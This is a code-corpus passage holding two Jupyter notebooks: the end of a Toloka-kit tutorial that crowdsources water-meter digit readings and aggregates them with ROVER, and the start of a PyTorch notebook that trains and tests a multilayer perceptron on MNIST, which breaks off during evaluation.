] | 29 | 2021-01-15T12:54:37.000Z | 2022-02-07T07:45:32.000Z | examples/1.computer_vision/text_recognition/text_recognition.ipynb | lehasm/toloka-kit | 8f650e5d8cdded1949ca633cf78f9b851ce839bb | [
"Apache-2.0"
] | 17 | 2021-01-29T15:20:04.000Z | 2022-01-30T07:21:03.000Z | 33.018221 | 437 | 0.568104 | [
[
[
"# Text recognition\nWe have a set of water meter images. We need to get each water meter’s readings. We ask performers to look at the images and write down the digits on each water meter.",
"_____no_output_____"
],
[
"To get acquainted with Toloka tools for free, you can use the promo code **TOLOKAKIT1** on $20 on your [profile page](https://toloka.yandex.com/requester/profile?utm_source=github&utm_medium=site&utm_campaign=tolokakit) after registration.",
"_____no_output_____"
],
[
"Prepare environment and import all we'll need.",
"_____no_output_____"
]
],
[
[
"!pip install toloka-kit==0.1.15\n!pip install crowd-kit==0.0.7\n!pip install ipyplot\n\nimport datetime\nimport os\nimport sys\nimport time\nimport logging\n\nimport ipyplot\nimport pandas\nimport numpy as np\n\nimport toloka.client as toloka\nimport toloka.client.project.template_builder as tb\nfrom crowdkit.aggregation import ROVER\n\nlogging.basicConfig(\n format='[%(levelname)s] %(name)s: %(message)s',\n level=logging.INFO,\n stream=sys.stdout,\n)",
"_____no_output_____"
]
],
[
[
"Сreate toloka-client instance. All api calls will go through it. More about OAuth token in our [Learn the basics example](https://github.com/Toloka/toloka-kit/tree/main/examples/0.getting_started/0.learn_the_basics) [](https://colab.research.google.com/github/Toloka/toloka-kit/blob/main/examples/0.getting_started/0.learn_the_basics/learn_the_basics.ipynb)",
"_____no_output_____"
]
],
[
[
"toloka_client = toloka.TolokaClient(input(\"Enter your token:\"), 'PRODUCTION') # Or switch to 'SANDBOX'\nlogging.info(toloka_client.get_requester())",
"_____no_output_____"
]
],
[
[
"## Creating new project\nEnter a clear project name and description.\n> The project name and description will be visible to the performers.",
"_____no_output_____"
]
],
[
[
"project = toloka.Project(\n public_name='Write down the digits in an image',\n public_description='Look at the image and write down the digits shown on the water meter.',\n)",
"_____no_output_____"
]
],
[
[
"Create task interface.\n\n- Read about configuring the [task interface](https://toloka.ai/docs/guide/reference/interface-spec.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in the Requester’s Guide.\n- Check the [Interfaces section](https://toloka.ai/knowledgebase/interface?utm_source=github&utm_medium=site&utm_campaign=tolokakit) of our Knowledge Base for more tips on interface design.\n- Read more about the [Template builder](https://toloka.ai/docs/template-builder/index.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in the Requester’s Guide.",
"_____no_output_____"
]
],
[
[
"header_viewer = tb.MarkdownViewV1(\"\"\"1. Look at the image\n2. Find boxes with the numbers\n3. Write down the digits in black section. (Put '0' if there are no digits there)\n4. Put '.'\n5. Write down the digits in red section\"\"\")\n\nimage_viewer = tb.ImageViewV1(tb.InputData('image_url'), rotatable=True)\n\noutput_field = tb.TextFieldV1(\n tb.OutputData('value'),\n label='Write down the digits. Format: 365.235',\n placeholder='Enter value',\n hint=\"Make sure your format of number is '365.235' or '0.112'\",\n validation=tb.SchemaConditionV1(\n schema={\n 'type': 'string',\n 'pattern': r'^\\d+\\.?\\d{0,3}$',\n 'minLength': 1,\n 'maxLength': 9,\n }\n )\n)\n\ntask_width_plugin = tb.TolokaPluginV1('scroll', task_width=600)\n\nproject_interface = toloka.project.TemplateBuilderViewSpec(\n view=tb.ListViewV1([header_viewer, image_viewer, output_field]),\n plugins=[task_width_plugin],\n)",
"_____no_output_____"
]
],
[
[
"Set data specification. And set task interface to project.\n> Specifications are a description of input data that will be used in a project and the output data that will be collected from the performers.\n\nRead more about [input and output data specifications](https://yandex.ru/support/toloka-tb/operations/create-specs.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in the Requester’s Guide.",
"_____no_output_____"
]
],
[
[
"input_specification = {'image_url': toloka.project.UrlSpec()}\noutput_specification = {'value': toloka.project.StringSpec()}\n\nproject.task_spec = toloka.project.task_spec.TaskSpec(\n input_spec=input_specification,\n output_spec=output_specification,\n view_spec=project_interface,\n)",
"_____no_output_____"
]
],
[
[
"Write short and clear instructions.\n\n> Though the task itself is simple, be sure to add examples for non-obvious cases (like when there are no red digits on an image). This helps to eliminate noise in the labels.\n\nGet more tips on designing [instructions](https://toloka.ai/knowledgebase/instruction?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in our Knowledge Base.",
"_____no_output_____"
]
],
[
[
"project.public_instructions = \"\"\"This task is to solve machine learning problem of digit recognition on the image.<br>\nThe more precise you read the information from the image the more precise would be algorithm<br>\nYour contribution here is to get exact information even if there are any complicated and uncertain cases.<br>\nWe hope for your skills to solve one of the important science problem.<br><br>\n<b>Basic steps:</b><br>\n<ul><li>Look at the image and find meter with the numbers in the boxes</li>\n<li>Find black numbers/section and red numbers/section</li>\n<li>Put black and red numbers separated with '.' to text field</li></ul>\"\"\"",
"_____no_output_____"
]
],
[
[
"Create a project.",
"_____no_output_____"
]
],
[
[
"project = toloka_client.create_project(project)",
"_____no_output_____"
]
],
[
[
"## Preparing data\nThis example uses [Toloka WaterMeters](https://toloka.ai/datasets?utm_source=github&utm_medium=site&utm_campaign=tolokakit) dataset collected by Roman Kucev.",
"_____no_output_____"
]
],
[
[
"!curl https://s3.mds.yandex.net/tlk/dataset/TlkWaterMeters/data.tsv --output data.tsv\n\nraw_dataset = pandas.read_csv('data.tsv', sep='\\t', dtype={'value': 'str'})\nraw_dataset = raw_dataset[['image_url', 'value']]\n\nwith pandas.option_context(\"max_colwidth\", 100):\n display(raw_dataset)",
" % Total % Received % Xferd Average Speed Time Time Time Current\n Dload Upload Total Spent Left Speed\n100 570k 100 570k 0 0 3299k 0 --:--:-- --:--:-- --:--:-- 3280k\n"
]
],
[
[
"Lets look at the images from this dataset:\n\n<table align=\"center\">\n <tr>\n <td>\n <img src=\"https://tlk.s3.yandex.net/dataset/TlkWaterMeters/images/id_53_value_595_825.jpg\" alt=\"value 595.825\">\n </td>\n <td>\n <img src=\"https://tlk.s3.yandex.net/dataset/TlkWaterMeters/images/id_553_value_65_475.jpg\" alt=\"value 65.475\">\n </td>\n <td>\n <img src=\"https://tlk.s3.yandex.net/dataset/TlkWaterMeters/images/id_407_value_21_86.jpg\" alt=\"value 21.860\">\n </td>\n </tr>\n <tr><td align=\"center\" colspan=\"3\">\n <b>Figure 1.</b> Images from dataset\n </td></tr>\n</table>",
"_____no_output_____"
],
[
"Split this dataset into three parts\n- Training tasks - we'll put them into training. This type of task must contain ground truth and hint about how to perform it.\n- Golden tasks - we'll put it into the regular pool. This type of task must contain ground truth.\n- Regular tasks - for regular pool. Only image url as input.",
"_____no_output_____"
]
],
[
[
"raw_dataset = raw_dataset.sample(frac=1).reset_index(drop=True)\n\ntraining_dataset, golden_dataset, main_dataset, _ = np.split(raw_dataset, [10, 20, 120], axis=0)\nprint(f'training_dataset - {len(training_dataset)}')\nprint(f'golden_dataset - {len(golden_dataset)}')\nprint(f'main_dataset - {len(main_dataset)}')",
"training_dataset - 10\ngolden_dataset - 10\nmain_dataset - 100\n"
]
],
[
[
"## Create a training pool\n> Training is an essential part of almost every crowdsourcing project. It allows you to select performers who have really mastered the task, and thus improve quality. Training is also a great tool for scaling your task because you can run it any time you need new performers.\n\nRead more about [selecting performers](https://toloka.ai/knowledgebase/quality-control?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in our Knowledge Base.",
"_____no_output_____"
]
],
[
[
"training = toloka.Training(\n project_id=project.id,\n private_name='Text recognition training',\n may_contain_adult_content=False,\n assignment_max_duration_seconds=60*10,\n mix_tasks_in_creation_order=False,\n shuffle_tasks_in_task_suite=False,\n training_tasks_in_task_suite_count=2,\n task_suites_required_to_pass=5,\n retry_training_after_days=5,\n inherited_instructions=True,\n)\ntraining = toloka_client.create_training(training)",
"_____no_output_____"
]
],
[
[
"Upload training tasks to the pool.\n> It’s important to include examples for all сases in the training. Make sure the training set is balanced and the comments explain why an answer is correct. Don’t just name the correct answers.",
"_____no_output_____"
]
],
[
[
"training_tasks = [\n toloka.Task(\n pool_id=training.id,\n input_values={'image_url': row.image_url},\n known_solutions = [toloka.task.BaseTask.KnownSolution(output_values={'value': row.value})],\n message_on_unknown_solution=f'Black section is {row.value.split(\".\")[0]}. Red section is {row.value.split(\".\")[1]}.',\n )\n for row in training_dataset.itertuples()\n]\nresult = toloka_client.create_tasks(training_tasks, allow_defaults=True)\nprint(len(result.items))",
"10\n"
]
],
[
[
"## Create the main pool\nA pool is a set of paid tasks grouped into task pages. These tasks are sent out for completion at the same time.\n\n> All tasks within a pool have the same settings (price, quality control, etc.)",
"_____no_output_____"
]
],
[
[
"pool = toloka.Pool(\n project_id=project.id,\n # Give the pool any convenient name. You are the only one who will see it.\n private_name='Write down the digits in an image.',\n may_contain_adult_content=False,\n # Set the price per task page.\n reward_per_assignment=0.02,\n will_expire=datetime.datetime.utcnow() + datetime.timedelta(days=365),\n # Overlap. This is the number of users who will complete the same task.\n defaults=toloka.Pool.Defaults(default_overlap_for_new_task_suites=3),\n # Time allowed for completing a task page\n assignment_max_duration_seconds=600,\n)",
"_____no_output_____"
]
],
[
[
"- Read more about [pricing principles](https://toloka.ai/knowledgebase/pricing?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in our Knowledge Base.\n- To understand [how overlap works](https://toloka.ai/docs/guide/concepts/mvote.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit), go to the Requester’s Guide.\n- To understand how much time it should take to complete a task suite, try doing it yourself.",
"_____no_output_____"
],
[
"Attach the training you created earlier and select the accuracy level that is required to reach the main pool.",
"_____no_output_____"
]
],
[
[
"pool.set_training_requirement(training_pool_id=training.id, training_passing_skill_value=75)",
"_____no_output_____"
]
],
[
[
"Select English-speaking performers",
"_____no_output_____"
]
],
[
[
"pool.filter = toloka.filter.Languages.in_('EN')",
"_____no_output_____"
]
],
[
[
"Set up [Quality control](https://toloka.ai/docs/guide/concepts/control.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit). Ban performers who give incorrect responses to control tasks.\n\n> Since tasks such as these have an answer that can be used as ground truth, we can use standard quality control rules like golden sets.\n\nRead more about [quality control principles](https://toloka.ai/knowledgebase/quality-control?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in our Knowledge Base or check out [control tasks settings](https://toloka.ai/docs/guide/concepts/goldenset.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in the Requester’s Guide.",
"_____no_output_____"
]
],
[
[
"pool.quality_control.add_action(\n collector=toloka.collectors.GoldenSet(),\n conditions=[\n toloka.conditions.GoldenSetCorrectAnswersRate < 80.0,\n toloka.conditions.GoldenSetAnswersCount >= 3\n ],\n action=toloka.actions.RestrictionV2(\n scope='PROJECT',\n duration=2,\n duration_unit='DAYS',\n private_comment='Control tasks failed'\n )\n)\n\npool.quality_control.add_action(\n collector=toloka.collectors.AssignmentSubmitTime(history_size=5, fast_submit_threshold_seconds=7),\n conditions=[toloka.conditions.FastSubmittedCount >= 1],\n action=toloka.actions.RestrictionV2(\n scope='PROJECT',\n duration=2,\n duration_unit='DAYS',\n private_comment='Fast response'\n ))",
"_____no_output_____"
]
],
[
[
"Specify\tthe number of tasks per page. For example: 3 main tasks and 1 control task.\n\n> We recommend putting as many tasks on one page as a performer can complete in 1 to 5 minutes. That way, performers are less likely to get tired, and they won’t lose a significant amount of data if a technical issue occurs.\n\nTo learn more about [grouping tasks](https://toloka.ai/docs/search/?utm_source=github&utm_medium=site&utm_campaign=tolokakit&query=smart+mixing) into suites, read the Requester’s Guide.",
"_____no_output_____"
]
],
[
[
"pool.set_mixer_config(\n real_tasks_count=3,\n golden_tasks_count=1\n)",
"_____no_output_____"
]
],
[
[
"Create pool",
"_____no_output_____"
]
],
[
[
"pool = toloka_client.create_pool(pool)",
"_____no_output_____"
]
],
[
[
"**Uploading tasks**\n\nCreate control tasks. In small pools, control tasks should account for 10–20% of all tasks.\n\n> Control tasks are tasks that already contain the correct response. They are used for checking the quality of responses from performers. The performer's response is compared to the response you provided. If they match, it means the performer answered correctly.\n> Make sure to include different variations of correct responses in equal amounts.\n\nTo learn more about [creating control tasks](https://toloka.ai/docs/guide/concepts/task_markup.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit), go to the Requester’s Guide.",
"_____no_output_____"
]
],
[
[
"golden_tasks = [\n toloka.Task(\n pool_id=pool.id,\n input_values={'image_url': row.image_url},\n known_solutions = [\n toloka.task.BaseTask.KnownSolution(\n output_values={'value': row.value}\n )\n ],\n infinite_overlap=True,\n )\n for row in golden_dataset.itertuples()\n]",
"_____no_output_____"
]
],
[
[
"Create pool tasks",
"_____no_output_____"
]
],
[
[
"tasks = [\n toloka.Task(\n pool_id=pool.id,\n input_values={'image_url': url},\n )\n for url in main_dataset['image_url']\n]",
"_____no_output_____"
]
],
[
[
"Upload tasks",
"_____no_output_____"
]
],
[
[
"created_tasks = toloka_client.create_tasks(golden_tasks + tasks, allow_defaults=True)\nprint(len(created_tasks.items))",
"110\n"
]
],
[
[
"You can visit created pool in web-interface and preview tasks and control tasks.\n\n<table align=\"center\">\n <tr>\n <td>\n <img src=\"./img/performer_interface.png\" alt=\"Possible performer interface\">\n </td>\n </tr>\n <tr><td align=\"center\">\n <b>Figure 2.</b> Possible performer interface.\n </td></tr>\n</table>",
"_____no_output_____"
],
[
"Start the pool.\n\n**Important.** Remember that real Toloka performers will complete the tasks.\nDouble check that everything is correct\nwith your project configuration before you start the pool",
"_____no_output_____"
]
],
[
[
"training = toloka_client.open_training(training.id)\nprint(f'training - {training.status}')\n\npool = toloka_client.open_pool(pool.id)\nprint(f'main pool - {pool.status}')",
"_____no_output_____"
]
],
[
[
"## Receiving responses",
"_____no_output_____"
],
[
"Wait until the pool is completed.",
"_____no_output_____"
]
],
[
[
"pool_id = pool.id\n\ndef wait_pool_for_close(pool_id, minutes_to_wait=1):\n sleep_time = 60 * minutes_to_wait\n pool = toloka_client.get_pool(pool_id)\n while not pool.is_closed():\n op = toloka_client.get_analytics([toloka.analytics_request.CompletionPercentagePoolAnalytics(subject_id=pool.id)])\n op = toloka_client.wait_operation(op)\n percentage = op.details['value'][0]['result']['value']\n logging.info(\n f' {datetime.datetime.now().strftime(\"%H:%M:%S\")}\\t'\n f'Pool {pool.id} - {percentage}%'\n )\n time.sleep(sleep_time)\n pool = toloka_client.get_pool(pool.id)\n logging.info('Pool was closed.')\n\nwait_pool_for_close(pool_id)",
"_____no_output_____"
]
],
[
[
"Get responses\n\nWhen all the tasks are completed, look at the responses from performers.",
"_____no_output_____"
]
],
[
[
"answers = []\n\nfor assignment in toloka_client.get_assignments(pool_id=pool.id, status='ACCEPTED'):\n for task, solution in zip(assignment.tasks, assignment.solutions):\n if not task.known_solutions:\n answers.append([task.input_values['image_url'], solution.output_values['value'], assignment.user_id])\n\nprint(f'answers count: {len(answers)}')\n# Prepare dataframe\nanswers_df = pandas.DataFrame(answers, columns=['task', 'text', 'performer'])",
"answers count: 300\n"
]
],
[
[
"Aggregation results using the ROVER model impemented in [Crowd-Kit](https://github.com/Toloka/crowd-kit#crowd-kit-computational-quality-control-for-crowdsourcing).",
"_____no_output_____"
]
],
[
[
"rover_agg_df = ROVER(tokenizer=lambda x: list(x), detokenizer=lambda x: ''.join(x)).fit_predict(answers_df)",
"_____no_output_____"
]
],
[
[
"Look at the results.\n\nSome preparations for displaying the results",
"_____no_output_____"
]
],
[
[
"images = rover_agg_df.index.values\nlabels = rover_agg_df.values\nstart_with = 0",
"_____no_output_____"
]
],
[
[
"Note: The cell below can be run several times.",
"_____no_output_____"
]
],
[
[
"if start_with >= len(rover_agg_df):\n logging.info('no more images')\nelse:\n ipyplot.plot_images(\n images=images[start_with:],\n labels=labels[start_with:],\n max_images=8,\n img_width=300,\n )\n\n start_with += 8",
"_____no_output_____"
]
],
[
[
"**You** can see the labeled images. Some possible results are shown in figure 3 below.\n\n<table align=\"center\">\n <tr><td>\n <img src=\"./img/possible_result.png\"\n alt=\"Possible results\">\n </td></tr>\n <tr><td align=\"center\">\n <b>Figure 3.</b> Possible results.\n </td></tr>\n</table>",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb2ca965120380abaaf7244f8b387a43d6a865f5 | 167,560 | ipynb | Jupyter Notebook | convolutional-neural-networks/mnist-mlp/mnist_mlp_solution.ipynb | Oriolac/deep-learning-pytorch-exs | 1edc66d1bb4b1196ef47a048129240c9f350da91 | [
"MIT"
] | 1 | 2021-10-21T13:24:27.000Z | 2021-10-21T13:24:27.000Z | convolutional-neural-networks/mnist-mlp/mnist_mlp_solution.ipynb | Oriolac/deep-learning-pytorch-exs | 1edc66d1bb4b1196ef47a048129240c9f350da91 | [
"MIT"
] | null | null | null | convolutional-neural-networks/mnist-mlp/mnist_mlp_solution.ipynb | Oriolac/deep-learning-pytorch-exs | 1edc66d1bb4b1196ef47a048129240c9f350da91 | [
"MIT"
] | null | null | null | 301.90991 | 97,380 | 0.915767 | [
[
[
"# Multi-Layer Perceptron, MNIST\n---\nIn this notebook, we will train an MLP to classify images from the [MNIST database](http://yann.lecun.com/exdb/mnist/) hand-written digit database.\n\nThe process will be broken down into the following steps:\n>1. Load and visualize the data\n2. Define a neural network\n3. Train the model\n4. Evaluate the performance of our trained model on a test dataset!\n\nBefore we begin, we have to import the necessary libraries for working with data and PyTorch.",
"_____no_output_____"
]
],
[
[
"# import libraries\nimport torch\nimport numpy as np",
"_____no_output_____"
]
],
[
[
"---\n## Load and Visualize the [Data](http://pytorch.org/docs/stable/torchvision/datasets.html)\n\nDownloading may take a few moments, and you should see your progress as the data is loading. You may also choose to change the `batch_size` if you want to load more data at a time.\n\nThis cell will create DataLoaders for each of our datasets.",
"_____no_output_____"
]
],
[
[
"# The MNIST datasets are hosted on yann.lecun.com that has moved under CloudFlare protection\n# Run this script to enable the datasets download\n# Reference: https://github.com/pytorch/vision/issues/1938\n\nfrom six.moves import urllib\nopener = urllib.request.build_opener()\nopener.addheaders = [('User-agent', 'Mozilla/5.0')]\nurllib.request.install_opener(opener)",
"_____no_output_____"
],
[
"from torchvision import datasets\nimport torchvision.transforms as transforms\n\n# number of subprocesses to use for data loading\nnum_workers = 0\n# how many samples per batch to load\nbatch_size = 20\n\n# convert data to torch.FloatTensor\ntransform = transforms.ToTensor()\n\n# choose the training and test datasets\ntrain_data = datasets.MNIST(root='data', train=True,\n download=True, transform=transform)\ntest_data = datasets.MNIST(root='data', train=False,\n download=True, transform=transform)\n\n# prepare data loaders\ntrain_loader = torch.utils.data.DataLoader(train_data, batch_size=batch_size,\n num_workers=num_workers)\ntest_loader = torch.utils.data.DataLoader(test_data, batch_size=batch_size, \n num_workers=num_workers)",
"/home/oriol/exs/deep-learning-v2-pytorch/venv/lib/python3.8/site-packages/torchvision/datasets/mnist.py:498: UserWarning: The given NumPy array is not writeable, and PyTorch does not support non-writeable tensors. This means you can write to the underlying (supposedly non-writeable) NumPy array using the tensor. You may want to copy the array to protect its data or make it writeable before converting it to a tensor. This type of warning will be suppressed for the rest of this program. (Triggered internally at ../torch/csrc/utils/tensor_numpy.cpp:180.)\n return torch.from_numpy(parsed.astype(m[2], copy=False)).view(*s)\n"
]
],
[
[
"### Visualize a Batch of Training Data\n\nThe first step in a classification task is to take a look at the data, make sure it is loaded in correctly, then make any initial observations about patterns in that data.",
"_____no_output_____"
]
],
[
[
"import matplotlib.pyplot as plt\n%matplotlib inline\n \n# obtain one batch of training images\ndataiter = iter(train_loader)\nimages, labels = dataiter.next()\nimages = images.numpy()\n\n# plot the images in the batch, along with the corresponding labels\nfig = plt.figure(figsize=(25, 4))\nfor idx in np.arange(20):\n ax = fig.add_subplot(2, 20/2, idx+1, xticks=[], yticks=[])\n ax.imshow(np.squeeze(images[idx]), cmap='gray')\n # print out the correct label for each image\n # .item() gets the value contained in a Tensor\n ax.set_title(str(labels[idx].item()))",
"/tmp/ipykernel_2795/611598023.py:12: MatplotlibDeprecationWarning: Passing non-integers as three-element position specification is deprecated since 3.3 and will be removed two minor releases later.\n ax = fig.add_subplot(2, 20/2, idx+1, xticks=[], yticks=[])\n"
]
],
[
[
"### View an Image in More Detail",
"_____no_output_____"
]
],
[
[
"img = np.squeeze(images[1])\n\nfig = plt.figure(figsize = (12,12)) \nax = fig.add_subplot(111)\nax.imshow(img, cmap='gray')\nwidth, height = img.shape\nthresh = img.max()/2.5\nfor x in range(width):\n for y in range(height):\n val = round(img[x][y],2) if img[x][y] !=0 else 0\n ax.annotate(str(val), xy=(y,x),\n horizontalalignment='center',\n verticalalignment='center',\n color='white' if img[x][y]<thresh else 'black')",
"_____no_output_____"
]
],
[
[
"---\n## Define the Network [Architecture](http://pytorch.org/docs/stable/nn.html)\n\nThe architecture will be responsible for seeing as input a 784-dim Tensor of pixel values for each image, and producing a Tensor of length 10 (our number of classes) that indicates the class scores for an input image. This particular example uses two hidden layers and dropout to avoid overfitting.",
"_____no_output_____"
]
],
[
[
"import torch.nn as nn\nimport torch.nn.functional as F\n\n# define the NN architecture\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n # number of hidden nodes in each layer (512)\n hidden_1 = 512\n hidden_2 = 512\n # linear layer (784 -> hidden_1)\n self.fc1 = nn.Linear(28 * 28, hidden_1)\n # linear layer (n_hidden -> hidden_2)\n self.fc2 = nn.Linear(hidden_1, hidden_2)\n # linear layer (n_hidden -> 10)\n self.fc3 = nn.Linear(hidden_2, 10)\n # dropout layer (p=0.2)\n # dropout prevents overfitting of data\n self.dropout = nn.Dropout(0.2)\n\n def forward(self, x):\n # flatten image input\n x = x.view(-1, 28 * 28)\n # add hidden layer, with relu activation function\n x = F.relu(self.fc1(x))\n # add dropout layer\n x = self.dropout(x)\n # add hidden layer, with relu activation function\n x = F.relu(self.fc2(x))\n # add dropout layer\n x = self.dropout(x)\n # add output layer\n x = self.fc3(x)\n return x\n\n# initialize the NN\nmodel = Net()\nprint(model)",
"Net(\n (fc1): Linear(in_features=784, out_features=512, bias=True)\n (fc2): Linear(in_features=512, out_features=512, bias=True)\n (fc3): Linear(in_features=512, out_features=10, bias=True)\n (dropout): Dropout(p=0.2, inplace=False)\n)\n"
]
],
[
[
"### Specify [Loss Function](http://pytorch.org/docs/stable/nn.html#loss-functions) and [Optimizer](http://pytorch.org/docs/stable/optim.html)\n\nIt's recommended that you use cross-entropy loss for classification. If you look at the documentation (linked above), you can see that PyTorch's cross entropy function applies a softmax funtion to the output layer *and* then calculates the log loss.",
"_____no_output_____"
]
],
[
[
"# specify loss function (categorical cross-entropy)\ncriterion = nn.CrossEntropyLoss()\n\n# specify optimizer (stochastic gradient descent) and learning rate = 0.01\noptimizer = torch.optim.SGD(model.parameters(), lr=0.01)",
"_____no_output_____"
]
],
[
[
"---\n## Train the Network\n\nThe steps for training/learning from a batch of data are described in the comments below:\n1. Clear the gradients of all optimized variables\n2. Forward pass: compute predicted outputs by passing inputs to the model\n3. Calculate the loss\n4. Backward pass: compute gradient of the loss with respect to model parameters\n5. Perform a single optimization step (parameter update)\n6. Update average training loss\n\nThe following loop trains for 50 epochs; take a look at how the values for the training loss decrease over time. We want it to decrease while also avoiding overfitting the training data.",
"_____no_output_____"
]
],
[
[
"# number of epochs to train the model\nn_epochs = 50\n\nmodel.train() # prep model for training\n\nfor epoch in range(n_epochs):\n # monitor training loss\n train_loss = 0.0\n \n ###################\n # train the model #\n ###################\n for data, target in train_loader:\n # clear the gradients of all optimized variables\n optimizer.zero_grad()\n # forward pass: compute predicted outputs by passing inputs to the model\n output = model(data)\n # calculate the loss\n loss = criterion(output, target)\n # backward pass: compute gradient of the loss with respect to model parameters\n loss.backward()\n # perform a single optimization step (parameter update)\n optimizer.step()\n # update running training loss\n train_loss += loss.item()*data.size(0)\n \n # print training statistics \n # calculate average loss over an epoch\n train_loss = train_loss/len(train_loader.dataset)\n\n print('Epoch: {} \\tTraining Loss: {:.6f}'.format(\n epoch+1, \n train_loss\n ))",
"Epoch: 1 \tTraining Loss: 0.833544\nEpoch: 2 \tTraining Loss: 0.321996\nEpoch: 3 \tTraining Loss: 0.247905\nEpoch: 4 \tTraining Loss: 0.201408\nEpoch: 5 \tTraining Loss: 0.169627\nEpoch: 6 \tTraining Loss: 0.147488\nEpoch: 7 \tTraining Loss: 0.129424\nEpoch: 8 \tTraining Loss: 0.116433\nEpoch: 9 \tTraining Loss: 0.104333\nEpoch: 10 \tTraining Loss: 0.094504\nEpoch: 11 \tTraining Loss: 0.085769\nEpoch: 12 \tTraining Loss: 0.080728\nEpoch: 13 \tTraining Loss: 0.073689\nEpoch: 14 \tTraining Loss: 0.067905\nEpoch: 15 \tTraining Loss: 0.063251\nEpoch: 16 \tTraining Loss: 0.058666\nEpoch: 17 \tTraining Loss: 0.055106\nEpoch: 18 \tTraining Loss: 0.050979\nEpoch: 19 \tTraining Loss: 0.048491\nEpoch: 20 \tTraining Loss: 0.046173\nEpoch: 21 \tTraining Loss: 0.044311\nEpoch: 22 \tTraining Loss: 0.041405\nEpoch: 23 \tTraining Loss: 0.038702\nEpoch: 24 \tTraining Loss: 0.036634\nEpoch: 25 \tTraining Loss: 0.035159\nEpoch: 26 \tTraining Loss: 0.033605\nEpoch: 27 \tTraining Loss: 0.030255\nEpoch: 28 \tTraining Loss: 0.029026\nEpoch: 29 \tTraining Loss: 0.028722\nEpoch: 30 \tTraining Loss: 0.027026\nEpoch: 31 \tTraining Loss: 0.026134\nEpoch: 32 \tTraining Loss: 0.022992\nEpoch: 33 \tTraining Loss: 0.023809\nEpoch: 34 \tTraining Loss: 0.022347\nEpoch: 35 \tTraining Loss: 0.021212\nEpoch: 36 \tTraining Loss: 0.020292\nEpoch: 37 \tTraining Loss: 0.019413\nEpoch: 38 \tTraining Loss: 0.019758\nEpoch: 39 \tTraining Loss: 0.017851\nEpoch: 40 \tTraining Loss: 0.017023\nEpoch: 41 \tTraining Loss: 0.016846\nEpoch: 42 \tTraining Loss: 0.016187\nEpoch: 43 \tTraining Loss: 0.015530\nEpoch: 44 \tTraining Loss: 0.014553\nEpoch: 45 \tTraining Loss: 0.014781\nEpoch: 46 \tTraining Loss: 0.013546\nEpoch: 47 \tTraining Loss: 0.013328\nEpoch: 48 \tTraining Loss: 0.012698\nEpoch: 49 \tTraining Loss: 0.012012\nEpoch: 50 \tTraining Loss: 0.012588\n"
]
],
[
[
"---\n## Test the Trained Network\n\nFinally, we test our best model on previously unseen **test data** and evaluate it's performance. Testing on unseen data is a good way to check that our model generalizes well. It may also be useful to be granular in this analysis and take a look at how this model performs on each class as well as looking at its overall loss and accuracy.",
"_____no_output_____"
]
],
[
[
"# initialize lists to monitor test loss and accuracy\ntest_loss = 0.0\nclass_correct = list(0. for i in range(10))\nclass_total = list(0. for i in range(10))\n\nmodel.eval() # prep model for training\n\nfor data, target in test_loader:\n # forward pass: compute predicted outputs by passing inputs to the model\n output = model(data)\n # calculate the loss\n loss = criterion(output, target)\n # update test loss \n test_loss += loss.item()*data.size(0)\n # convert output probabilities to predicted class\n _, pred = torch.max(output, 1)\n # compare predictions to true label\n correct = np.squeeze(pred.eq(target.data.view_as(pred)))\n # calculate test accuracy for each object class\n for i in range(batch_size):\n label = target.data[i]\n class_correct[label] += correct[i].item()\n class_total[label] += 1\n\n# calculate and print avg test loss\ntest_loss = test_loss/len(test_loader.dataset)\nprint('Test Loss: {:.6f}\\n'.format(test_loss))\n\nfor i in range(10):\n if class_total[i] > 0:\n print('Test Accuracy of %5s: %2d%% (%2d/%2d)' % (\n str(i), 100 * class_correct[i] / class_total[i],\n np.sum(class_correct[i]), np.sum(class_total[i])))\n else:\n print('Test Accuracy of %5s: N/A (no training examples)' % (classes[i]))\n\nprint('\\nTest Accuracy (Overall): %2d%% (%2d/%2d)' % (\n 100. * np.sum(class_correct) / np.sum(class_total),\n np.sum(class_correct), np.sum(class_total)))",
